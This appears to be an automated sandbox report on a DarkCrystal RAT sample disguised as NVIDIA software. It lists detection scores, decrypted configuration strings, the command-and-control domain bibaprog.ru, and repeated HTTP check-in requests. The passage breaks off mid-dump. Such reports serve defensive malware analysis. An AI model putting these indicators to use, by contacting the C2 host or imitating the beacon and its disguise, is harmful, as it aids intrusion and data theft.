Source: C:\Users\user\Desktop\PszJebvu.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ShoatPdx.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\TAxSAtpp.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TMLKnwYz.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\TxJtcnQc.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UCVIiXUm.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\VAeASPIF.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\XOysNJXm.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\XwgSVREI.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\chLhgIIs.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\cjQhkVuX.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\fjyPCrNn.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\gzqzblNZ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hxRHxlcT.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\oSRflUSV.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\pAbpDGmk.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\qiYwETGO.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\skLfaCLK.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\snUoPbCy.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ukwwlbRt.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\xYhnoKfH.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\zwfUdEOY.log	ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Source: NVIDIAShare.exe.bin.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\DnVLkBOS.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AOEnQqnj.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: NVIDIAShare.exe.bin.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["P2R1bmZ6NLngSNbcmEEcHQZQHBgi73VNdFCXiX4uz3wStXve5Ce0uSK9cAtaG18TzaDNLE3PJTmNdHhtPBm5ZfcK5D4hneo85ddSUiS1IOqbp6fVcAKFOD4T82RIJVlp","b11c43509f862efb5e6ac76246280a4e4f539faad6021ed5aa3ed20238541750","1","MZLFFF","","5","2","WyIyIiwie1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://bibaprog.ru/","ProviderEternallineauthmultiTrackwordpressWpDownloads"]]

Source: NVIDIAShare.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: NVIDIAShare.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NVIDIAShare.exe.bin.exe
Source:	Binary string: System.Windows.Forms.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2161092207.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2892138201.000000001B460000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7..pDb source: NVIDIA Container.exe, 00000005.00000002.2129474262.00007FF8493E0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0100A69B
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0102B348 FindFirstFileExA,	0_2_0102B348
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0101C220

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F21FD6h	12_2_00007FF848F21DCE
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F77B4Ch	12_2_00007FF848F77288
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F77B4Ch	12_2_00007FF848F772C8
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F77B4Ch	12_2_00007FF848F7794D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF8490E2096h	12_2_00007FF8490E2178
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F21FD6h	14_2_00007FF848F21DCE
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F21FD6h	19_2_00007FF848F21DCE
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F77B4Ch	26_2_00007FF848F77288
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F77B4Ch	26_2_00007FF848F772C8
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F77B4Ch	26_2_00007FF848F7794D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF848F21FD6h	26_2_00007FF848F21DCE
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 4x nop then jmp 00007FF8490E2096h	26_2_00007FF8490E2178

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49704 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49796 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49872 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49919 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49986 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49995 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49988 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49993 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49998 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49983 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49996 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49992 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49997 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49994 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49987 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49991 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49985 -> 104.21.64.1:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: bibaprog.ru

Source: unknown

HTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LISi%2FyKNQHOROXN0SwqwNEZf6NVi2PaPrD8%2BkzPc6flTPWKpvYWWjiTU8nG%2BuUkWaHPJPMZUHGfYFnXaNmYJtbYhUIGDUOIjLozIkFwX4eGbTLAVPNVZ8I%2FY6rfepw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156fb35dae4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3400&min_rtt=1691&rtt_var=4052&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=95027&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRWxU10oe72zy83fkiUiOToSFQ8f7imE45wdMCVE31EHtK7R0EONs11BCWTsUVH6nsKRaUWjIdKio9PDE83nc0m2imGuBKJdC95V6n%2BisQzkFOjf%2B0AQ2XtOcUb3TA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156ffe0c724414-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3236&min_rtt=1663&rtt_var=3771&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=102427&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a23IktWnlu2tWtgHtkKgFX1IL80EvtYftf9uzgV4rW24X2Rwb8J1pqmRQ8whQbujtrA2lrDxRbDNHLmcmRLN%2BWUb7BWmIrn%2Bb3HH65GvS%2B8VAW7wQ%2BwiZiNRElkedw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015702fb9108ca1-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1970&rtt_var=5376&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=71146&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 